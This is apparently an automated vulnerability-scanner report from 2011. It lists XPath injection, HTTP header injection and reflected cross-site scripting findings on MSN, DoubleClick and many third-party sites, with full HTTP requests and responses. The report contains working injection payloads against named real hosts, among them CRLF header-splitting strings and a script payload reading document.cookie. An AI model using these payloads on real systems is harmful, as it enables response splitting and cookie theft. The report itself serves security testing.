The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /news'/ HTTP/1.1
Host: entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 53147
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=c371288793344ba29799f891089f3489; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 15:35:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Celebrity
...[SNIP]...
, feedVal, cssItem, cssCell4) { if(typeof feedVal == "undefined"){ feedTimeout = setTimeout(getNews,1000); } else{ var item = new XmlListItem(); item.dataXpath = "channel/item"; item.css = cssItem; linkOpen = "new"; item.link = "link"; item.linkXpath = "link"; if (!item.cells) item.cells = new Array();
...[SNIP]...

2.2. http://entertainment.msn.com/video/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://entertainment.msn.com
Path:	/video/

Issue detail

Request

GET /video'/ HTTP/1.1
Host: entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 53147
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=c0b4ae52bcfc4e1eb9d3383e05f466fb; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 15:33:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Celebrity
...[SNIP]...
, feedVal, cssItem, cssCell4) { if(typeof feedVal == "undefined"){ feedTimeout = setTimeout(getNews,1000); } else{ var item = new XmlListItem(); item.dataXpath = "channel/item"; item.css = cssItem; linkOpen = "new"; item.link = "link"; item.linkXpath = "link"; if (!item.cells) item.cells = new Array();
...[SNIP]...

3. HTTP header injection previous next
There are 2 instances of this issue:

/adi/N5506.150290.INVITEMEDIA/B5070033 [REST URL parameter 1]
/adi/N5506.150290.INVITEMEDIA/B5070033.24 [REST URL parameter 1]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

3.1. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5f134%0d%0a61816c1ba6c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5f134%0d%0a61816c1ba6c/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5f134
61816c1ba6c/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http: //ad.thewheelof.com/clk
Date: Wed, 02 Feb 2011 15:33:46 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.2. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 15468%0d%0a61dc607be51 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /15468%0d%0a61dc607be51/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/15468
61dc607be51/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http: //ad.thewheelof.com/clk
Date: Wed, 02 Feb 2011 15:33:47 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4. Cross-site scripting (reflected) previous next
There are 710 instances of this issue:

http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [campID parameter]
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [crID parameter]
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [partnerID parameter]
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [pub parameter]
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [pubICode parameter]
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [sz parameter]
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [url parameter]
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [campID parameter]
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [crID parameter]
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [partnerID parameter]
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [pub parameter]
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [pubICode parameter]
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [sz parameter]
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [url parameter]
http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [adurl parameter]
http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [ai parameter]
http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [client parameter]
http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [num parameter]
http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [sig parameter]
http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [sz parameter]
http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67 [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67 [sz parameter]
http://ad.doubleclick.net/adi/dmd.ehow/computers [REST URL parameter 3]
http://ad.doubleclick.net/adi/dmd.ehow/homepage [REST URL parameter 3]
http://ad.harrenmedianetwork.com/imp [Z parameter]
http://ad.harrenmedianetwork.com/imp [s parameter]
http://ad.harrenmedianetwork.com/st [ad_size parameter]
http://ad.harrenmedianetwork.com/st [ad_size parameter]
http://ad.harrenmedianetwork.com/st [section parameter]
http://ad.harrenmedianetwork.com/st [section parameter]
http://ad.reduxmedia.com/st [name of an arbitrarily supplied request parameter]
http://ad.scanmedios.com/imp [Z parameter]
http://ad.scanmedios.com/imp [s parameter]
http://ad.scanmedios.com/st [ad_size parameter]
http://ad.scanmedios.com/st [ad_size parameter]
http://ad.scanmedios.com/st [section parameter]
http://ad.scanmedios.com/st [section parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [&PID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [AN parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [ASID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [PG parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [TargetID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [UIT parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [name of an arbitrarily supplied request parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [&PID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [AN parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [ASID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [PG parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [REST URL parameter 2]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [REST URL parameter 3]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [TargetID parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [UIT parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [click parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [name of an arbitrarily supplied request parameter]
http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]
http://api.bizographics.com/v1/profile.json [api_key parameter]
http://api.bizographics.com/v1/profile.json [callback parameter]
https://api.bizographics.com/v1/profile.json [api_key parameter]
http://api.blogburst.com/EntityImageHandler.ashx [REST URL parameter 1]
http://api.blogburst.com/favicon.ico [REST URL parameter 1]
http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js [REST URL parameter 2]
http://api.blogburst.com/v1.0/WidgetDeliveryProxyStub.js [REST URL parameter 2]
http://api.blogburst.com/v1.0/WidgetDeliveryService.ashx [REST URL parameter 1]
http://api.blogburst.com/v1.0/WidgetDeliveryService.ashx [REST URL parameter 2]
http://api.demandbase.com/api/v1/ip.json [callback parameter]
http://apptools.com/examples/tableheight.php. [REST URL parameter 1]
http://apptools.com/examples/tableheight.php. [REST URL parameter 2]
http://apptools.com/examples/tableheight.php. [name of an arbitrarily supplied request parameter]
http://apptools.com/styles/apptools.css [REST URL parameter 1]
http://apptools.com/styles/apptools.css [REST URL parameter 2]
http://apptools.com/styles/print.css [REST URL parameter 1]
http://apptools.com/styles/print.css [REST URL parameter 2]
http://b.scorecardresearch.com/beacon.js [c1 parameter]
http://b.scorecardresearch.com/beacon.js [c2 parameter]
http://b.scorecardresearch.com/beacon.js [c3 parameter]
http://b.scorecardresearch.com/beacon.js [c4 parameter]
http://b.scorecardresearch.com/beacon.js [c5 parameter]
http://b.scorecardresearch.com/beacon.js [c6 parameter]
http://blekko.com/autocomplete [query parameter]
http://blekko.com/autocomplete [term parameter]
http://boardreader.com/domain/2mdn.net/x22 [name of an arbitrarily supplied request parameter]
http://boardreader.com/domain/2mdn.net/x22 [name of an arbitrarily supplied request parameter]
http://boardreader.com/domain/aol.com [name of an arbitrarily supplied request parameter]
http://boardreader.com/domain/aol.com [name of an arbitrarily supplied request parameter]
http://boardreader.com/domain/cafemom.com [name of an arbitrarily supplied request parameter]
http://boardreader.com/domain/cafemom.com [name of an arbitrarily supplied request parameter]
http://boardreader.com/domain/myegy.com [name of an arbitrarily supplied request parameter]
http://boardreader.com/domain/myegy.com [name of an arbitrarily supplied request parameter]
http://boardreader.com/domain/nolanfans.com [name of an arbitrarily supplied request parameter]
http://boardreader.com/domain/nolanfans.com [name of an arbitrarily supplied request parameter]
http://boardreader.com/domain/ratedesi.com [name of an arbitrarily supplied request parameter]
http://boardreader.com/domain/ratedesi.com [name of an arbitrarily supplied request parameter]
http://boardreader.com/domain/sherdog.net [name of an arbitrarily supplied request parameter]
http://boardreader.com/domain/sherdog.net [name of an arbitrarily supplied request parameter]
http://boardreader.com/domain/ufc.com [name of an arbitrarily supplied request parameter]
http://boardreader.com/domain/ufc.com [name of an arbitrarily supplied request parameter]
http://boardreader.com/domain/websitetoolbox.com [name of an arbitrarily supplied request parameter]
http://boardreader.com/domain/websitetoolbox.com [name of an arbitrarily supplied request parameter]
http://boardreader.com/domain/worldmastiffforum.com [name of an arbitrarily supplied request parameter]
http://boardreader.com/domain/worldmastiffforum.com [name of an arbitrarily supplied request parameter]
http://boardreader.com/index.php [ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d parameter]
http://boardreader.com/index.php [extended_search parameter]
http://boardreader.com/index.php [ltype parameter]
http://boardreader.com/index.php [name of an arbitrarily supplied request parameter]
http://boardreader.com/index.php [q parameter]
http://boardreader.com/index.php [q2 parameter]
http://boardreader.com/linkinfo/2mdn.net [REST URL parameter 2]
http://boardreader.com/my/signup.html [name of an arbitrarily supplied request parameter]
http://boardreader.com/s/2mdn.html [name of an arbitrarily supplied request parameter]
http://boardreader.com/s/2mdn.html [name of an arbitrarily supplied request parameter]
http://boardreader.com/site/Monterey_military_Group_CafeMo_764716.html [name of an arbitrarily supplied request parameter]
http://boardreader.com/site/Nolan_Fans_Forums_8842059.html [name of an arbitrarily supplied request parameter]
http://boardreader.com/site/RateDesi_Forums_13026.html [name of an arbitrarily supplied request parameter]
http://boardreader.com/site/Research_Learn_Message_Boards_1404604.html [name of an arbitrarily supplied request parameter]
http://boardreader.com/site/Sherdog_Mixed_Martial_Arts_For_14952.html [name of an arbitrarily supplied request parameter]
http://boardreader.com/site/The_CafeMom_Newcomers_Club_Gro_655408.html [name of an arbitrarily supplied request parameter]
http://boardreader.com/site/The_Mastiff_Sweet_Spot_6024491.html [name of an arbitrarily supplied request parameter]
http://boardreader.com/site/UFC_Community_Forum_9057873.html [name of an arbitrarily supplied request parameter]
http://boardreader.com/site/Ultimate_College_Softball_5898982.html [name of an arbitrarily supplied request parameter]
http://boardreader.com/site/mntdiat_mai_aigi_7486781.html [name of an arbitrarily supplied request parameter]
http://consumershealthyliving.com/clinical-study.html [name of an arbitrarily supplied request parameter]
http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]
http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]
http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]
http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]
http://ds.addthis.com/red/psi/p.json [callback parameter]
http://ds.addthis.com/red/psi/sites/www.ehow.com/p.json [callback parameter]
http://gocitykids.parentsconnect.com/data/service-calendar.json [jsoncallback parameter]
http://it.toolbox.com/blogs/database-soup [name of an arbitrarily supplied request parameter]
http://it.toolbox.com/blogs/database-talk [name of an arbitrarily supplied request parameter]
http://it.toolbox.com/blogs/db2luw [name of an arbitrarily supplied request parameter]
http://it.toolbox.com/blogs/db2zos [name of an arbitrarily supplied request parameter]
http://it.toolbox.com/blogs/elsua [name of an arbitrarily supplied request parameter]
http://it.toolbox.com/blogs/juice-analytics [name of an arbitrarily supplied request parameter]
http://it.toolbox.com/blogs/minimalit [name of an arbitrarily supplied request parameter]
http://it.toolbox.com/blogs/penguinista-databasiensis [name of an arbitrarily supplied request parameter]
http://it.toolbox.com/blogs/ppmtoday [name of an arbitrarily supplied request parameter]
http://js.revsci.net/gateway/gw.js [csid parameter]
http://kona5.kontera.com/KonaGet.js [l parameter]
http://kona5.kontera.com/KonaGet.js [rId parameter]
http://millenniumhotels.tt.omtrdc.net/m2/millenniumhotels/mbox/standard [mbox parameter]
https://my.omniture.com/login/ [name of an arbitrarily supplied request parameter]
https://my.omniture.com/login/ [name of an arbitrarily supplied request parameter]
https://my.omniture.com/p/suite/1.2/index.html [jpj parameter]
https://my.omniture.com/p/suite/1.2/index.html [name of an arbitrarily supplied request parameter]
https://my.omniture.com/p/suite/1.2/index.html [ssSession parameter]
http://showads.pubmatic.com/AdServer/AdServerServlet [frameName parameter]
http://showads.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]
http://showads.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]
http://sociallist.org/submit.php [lang parameter]
http://sociallist.org/submit.php [name of an arbitrarily supplied request parameter]
http://sociallist.org/submit.php [tag parameter]
http://sociallist.org/submit.php [text parameter]
http://sociallist.org/submit.php [title parameter]
http://sociallist.org/submit.php [type parameter]
http://sociallist.org/submit.php [url parameter]
http://track.roiservice.com/track/track.aspx [ROIID parameter]
http://wp-superslider.com/ [name of an arbitrarily supplied request parameter]
http://wp-superslider.com/index.php [REST URL parameter 1]
http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 1]
http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 2]
http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 3]
http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 4]
http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 5]
http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 6]
http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 1]
http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 2]
http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 3]
http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 4]
http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 5]
http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 6]
http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 7]
http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 8]
http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 9]
http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 1]
http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 2]
http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 3]
http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 4]
http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 5]
http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 6]
http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 7]
http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 8]
http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 9]
http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 1]
http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 2]
http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 3]
http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 4]
http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 5]
http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/nav-follow-min.js [REST URL parameter 6]
http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 1]
http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 2]
http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 3]
http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 4]
http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 5]
http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 6]
http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 1]
http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 2]
